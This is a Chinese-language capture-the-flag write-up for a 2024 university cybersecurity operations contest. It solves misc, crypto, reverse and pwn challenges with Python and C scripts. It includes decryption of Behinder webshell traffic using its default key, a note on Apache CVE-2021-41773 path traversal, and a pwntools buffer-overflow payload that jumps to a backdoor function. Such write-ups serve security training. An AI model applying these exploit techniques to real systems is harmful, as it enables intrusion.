2024 高校网络安全管理运维赛wp
misc
签到
gif内藏了flag,拼接后rot13
钓鱼邮件识别
base64解密邮件内容,得到第一段flag
flag{pHiSHhuntiNg}
注意到DKIM存在信息,根据GitHub - kmille/dkim-verify: Verifying a DKIM-Signature by hand,得到第二段flag
dig txt +short default._domainkey.foobar-edu-cn.com
"v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC8GgKsT+XBbAEBi0DlAX2ddQz5YOeiftZt5IvksHPnJqzv/Ckp5Iu8fWnPFXOGN7nPJtIvFDsWzW65FXXUVRjMntfcBNt97legXk/95dXAUMzG2i3 flag_part2=_Kn0wH0wt0_ qMcXGK+?+OwIDAQAB"
DMARC、SPF
dig txt +short spf.foobar-edu-cn.com
"v=spf1 redirect=spf.foobar-edu-cn.com"
"v=spf1 ip4:192.0.2.0/24 ip4:198.51.100.123 -all flag_part1={N0wY0u"
dig txt +short _dmarc.foobar-edu-cn.com
"v=DMARC1; p=quarantine; rua=mailto:dmarc_agg@foobar-edu-cn.com; ruf=mailto:dmarc_frf@flag_part3=ANAlys1sDNS}
拼接完整后得到flag
easyshell
冰蝎3.0,默认密码为:e45e329feb5d925b,可以看看:behinder_decrypt/decropt.php at master · melody27/behinder_decrypt · GitHub
解密以下流量
wXMPyNQkkVwIUwRmCdJvsbbN9rAT3TFkNlkEUss74vTkpmKI7uWZn8VnxlrAKnx5uKE28Gh0F/gPcq0bBoZvyJOA+mzUqI1XJL11zDKpxTzinmadeLYtXGJwTRmGbWu9xegJH8JVSQaHEqwOEltIRDxLmie1Fabk/SpgyViH+B4JQTn3VUkJyNDoHDJNW81QXcrQyy7VmFb1CEYqQ55IGx9XJLMMF+Jt/L7vlZkKRJa8SOMS52+jN0+wQ7u6voIJzyj5kc+t0Zi8+SN5PFzDI/Iahorbc67Z8lf20ohZiACoXimli6XaG+eNSI61ChlEOBI5ehsszpz2gkWtjMrU+JVFativxxUW+v1R3OfhDfGAAoJJFZPbMX44npM0PhizJUCJ0AfYuX8MlUp/SXPLYOKp7mHDi2zRDiimDHvYvJaD1x22qS0j+203vnlbo1dAvJyPhWE0f2N0rtgES0B+qEWgeWk9nCS2fEyxTozH+4fcXnbhdl68byLJWoJaxPOlJfWxO86cY/XZwu1RF3JxHY3p0f08VEjFVVRvbXnle6pdzdT/Dysh7XPZeYQ1o/1crPFH7MHP4fZrVW9iR/RXZfCXAYkYmSK2I1j8a1YsH7INFYLzzk5l+/If6UWuoq1SWhZD2C1sB78RXSkQpaHST5xq3hh3jj88Fd/LyF4/12Z51T93b/3J0hE2J9S+h2rV+bxROgCunCy1Z8h4Fu0ryj5+t3dk2ELoiuCkm6xlhJcvuZj1AWeEYJ/o9K9gNfAKte9hcQhYLcINyZbZW5GT3/acEfo61lgnHJX9i1Ioi/V3tM2f1Ju8Sae4GMXDXldAHusVGM8xXlKn+hBwpr9aGz0SZf6hUh0HklWljbPc7rMYfeZvW/evzOyg775bd9Jz4dMJgUoRdEjQawTh7Uo5NR/dd3qjKS8LQCM/+U83M+vjtRcNyRfMg3yyouDUVMDVX6v9OuqUGM0i8d997tOlY/wJt0Q+iXn1Kj41UjmioZU=
然后经过二次base64解密,得到一个压缩包,但是存在密码
解密这段流量
lBLAHykVA/Ftm007T6iX50EFfBYbQ2Ev6/LcZKqQFmRCYU3ukfY6zNY58RomL0eaGR77pTNGGFYAKXWI7iHpoh/r1cfWWrNPIkP/8ZmCdfMVL8njZDVz1i46F5O1bAa9fvXrCG/HSAkL1N43jPXrDSdeZAT+YM3byvaBCbIfAcM=
然后经过二次base64解密,得到
Hello, but what you're looking for isn't me.
发现此文件的7zip压缩后的crc32与压缩包内的secret2.txt相同,明文攻击得到密码
A8s123/+*
解压后secret1.txt即为flag
Gateway
在baseinfoSet.json找到了
106&112&101&107&127&101&104&49&57&56&53&56&54&56&49&51&51&105&56&103&106&49&56&50&56&103&102&56&52&101&104&102&105&53&101&53&102&129&
很像是flag,稍微找找规律
>>> a = "106&112&101&107&127&101&104&49&57&56&53&56&54&56&49&51&51&105&56&103&106&49&56&50&56&103&102&56&52&101&104&102&105&53&101&53&102&129"
>>> b = list(map(int,a.split("&")))
>>> b
[106, 112, 101, 107, 127, 101, 104, 49, 57, 56, 53, 56, 54, 56, 49, 51, 51, 105, 56, 103, 106, 49, 56, 50, 56, 103, 102, 56, 52, 101, 104, 102, 105, 53, 101, 53, 102, 129]
>>> c = [i-4 if i>57 else i for i in b]
>>> c
[102, 108, 97, 103, 123, 97, 100, 49, 57, 56, 53, 56, 54, 56, 49, 51, 51, 101, 56, 99, 102, 49, 56, 50, 56, 99, 98, 56, 52, 97, 100, 98, 101, 53, 97, 53, 98, 125]
>>> ''.join(list(map(chr,c)))
'flag{ad1985868133e8cf1828cb84adbe5a5b}'
SecretDB
观察到01 0f作为标记,后续两个字节,一个代表位置,一个代表字符,代码分析
_010f_index = [0x1EBE,0x1ECD,0x1ED5,0x1EDD,0x1EE5,0x1EED,0x1EF5,0x1EFD,0x1F05,0x1F0D,0x1F15,0x1F1D,0x1F25,0x1F2D,0x1F35,0x1F3D,0x1F45,0x1F4D,0x1F55,0x1F5D,0x1F65,0x1F6D,0x1F75,0x1F7D,0x1F85,0x1F8D,0x1F95,0x1F9D,0x1FA5,0x1FAD,0x1FB5,0x1FC4,0x1FCC,0x1FD4,0x1FDC,0x1FE4,0x1FEC,0x1FF4,0x1FFC]
sort_index = {}
data = open("./secret.db","rb").read()
for i in _010f_index:
sort_index[ord(chr(data[i+2]))] = chr(data[i+3])
flag = ""
for i in range(42):
if i in sort_index.keys():
flag += sort_index[i]
else:
flag += "?"
print(flag)
之后再爆破剩余的一位即可
zip
未能解出
Apache
发现apache版本为:2.4.49,存在目录穿越漏洞,CVE-2021-41773
FROM httpd:2.4.49-buster
COPY ./httpd.conf /usr/local/apache2/conf/httpd.conf
for r
未能解出
Algorithm
babyai
readSeed有溢出漏洞,可能可以利用
secretbit
题目给出程序
from secret import flag
from random import randrange, shuffle
from Crypto.Util.number import bytes_to_long
from tqdm import tqdm
def instance(m, n):
start = list(range(m))
shuffle(start)
for i in range(m):
now = start[i]
this_turn = False
for j in range(n-1):
if now == i:
this_turn = True
break
now = start[now]
if not this_turn:
return 0
return 1
def leak(m, n, times=2000):
message = [instance(m, n) for _ in range(times)]
return message
MAX_M = 400
MIN_M = 200
flag_b = [int(i) for i in bin(bytes_to_long(flag))[2:]]
leak_message = []
for bi in tqdm(flag_b):
while True:
tmp_m0 = randrange(MIN_M, MAX_M)
tmp_n0 = randrange(int(tmp_m0//2), int(tmp_m0 * 8 // 9))
tmp_m1 = randrange(MIN_M, MAX_M)
tmp_n1 = randrange(int(tmp_m1//2), int(tmp_m1 * 8 // 9))
if abs(tmp_m0-tmp_m1-tmp_n0+tmp_n1) > MAX_M // 5:
break
choose_m = tmp_m0 if bi == 0 else tmp_m1
choose_n = tmp_n0 if bi == 0 else tmp_n1
leak_message.append([[tmp_m0, tmp_n0], [tmp_m1, tmp_n1], leak(choose_m, choose_n)])
open('data.txt', 'w').write(str(leak_message))
大概就是自己实现了instance,然后将拆开flag的每个二进制位,然后根据0或1选择不同的组,之后再进行循环随机处理
由于代码很完整,并且循环次数较多,可以自己计算得到0或1的个数和给定的数据做比较,取靠近的组作为结果,进而求解出每一个二进制位
from random import randrange, shuffle
from Crypto.Util.number import long_to_bytes
def instance(m, n):
start = list(range(m))
shuffle(start)
for i in range(m):
now = start[i]
this_turn = False
for j in range(n-1):
if now == i:
this_turn = True
break
now = start[now]
if not this_turn:
return 0
return 1
def leak(m, n, times=2000):
message = [instance(m, n) for _ in range(times)]
return message
data = open('data.txt','r')
data = eval(data.read())
flag_bit = ""
for d in data:
u = 0
for dd in d[2]:u+=dd
bit1 = leak(d[0][0],d[0][1])
x1 = 0
for dd1 in bit1:x1+=dd1
bit2 = leak(d[1][0],d[1][1])
x2 = 0
for dd2 in bit2:x2+=dd2
if abs(u-x1)>abs(u-x2):
flag_bit += "1"
print(flag_bit)
else:
flag_bit += "0"
print(flag_bit)
# 110011001101100011000010110011101111011011101000110100001101001011100110101111100110001011100110101111101110100011010000110010101011111011100110100010101100011011100100110010101110100010111110110011000110001011000010110011101111101
flag_bit = int(flag_bit,2)
print(long_to_bytes(flag_bit))
reverse
easyre
加密算法为变异base64,换表解密
import base64
table = "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/"
table_ = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
def custom_b64decode(input_str):
std_encoded = input_str.translate(str.maketrans(table, table_))
decoded_bytes = base64.b64decode(std_encoded)
return decoded_bytes
flag_encode = "AncsA6gXMSMoMqIuNCMuxaYuAGIavC9="
print(custom_b64decode(flag_encode))
babyre
upx加壳后的程序,脱壳后分析发现flag为4部分构成,爆破即可
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <iostream>
int main()
{
printf("%08x\n",0xADB1D018+0x36145344);
for(uint32_t i=0;i<0xffffffff;i++)
{
if((i | 0x8E03BEC3) - 3 * (i & 0x71FC413C) + i == 0x902C7FF8)
{
printf("%08x\n",i);
break;
}
}
for(uint32_t i=0;i<0x10000000;i++)
{
if ( 4 * ((~i & 0xA8453437) + 2 * ~(~i | 0xA8453437)) + -3 * (~i | 0xA8453437) + 3 * ~(i | 0xA8453437) - (-10 * (i & 0xA8453437) + (i ^ 0xA8453437)) == 551387557 )
{
printf("%08x\n",i);
break;
}
}
for(uint32_t i = 0;i<0x10000000;i++)
{
if ( 11 * ~(i ^ 0xE33B67BD) + 4 * ~(~i | 0xE33B67BD) - (6 * (i & 0xE33B67BD) + 12 * ~(i | 0xE33B67BD)) + 3 * (i & 0xD2C7FC0C) + -5 * i - 2 * ~(i | 0xD2C7FC0C) + ~(i | 0x2D3803F3) + 4 * (i & 0x2D3803F3) - (-2) * (i | 0x2D3803F3) == -837785892 )
{
printf("%08x\n",i);
break;
}
}
return 0;
}
pwn
babypwn
溢出到后门函数达成pwn
from pwn import *
p=process("./babypwn")
p.recvuntil(b'username:')
payload=b'root'
p.sendline(payload)
p.recvuntil(b'password:')
payload=b'a'*(0x30+0x08)+p64(0x401177)
p.sendline(payload)
p.interactive()
作者:寒江寻影
本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须在文章页面给出原文链接,否则保留追究法律责任的权利。
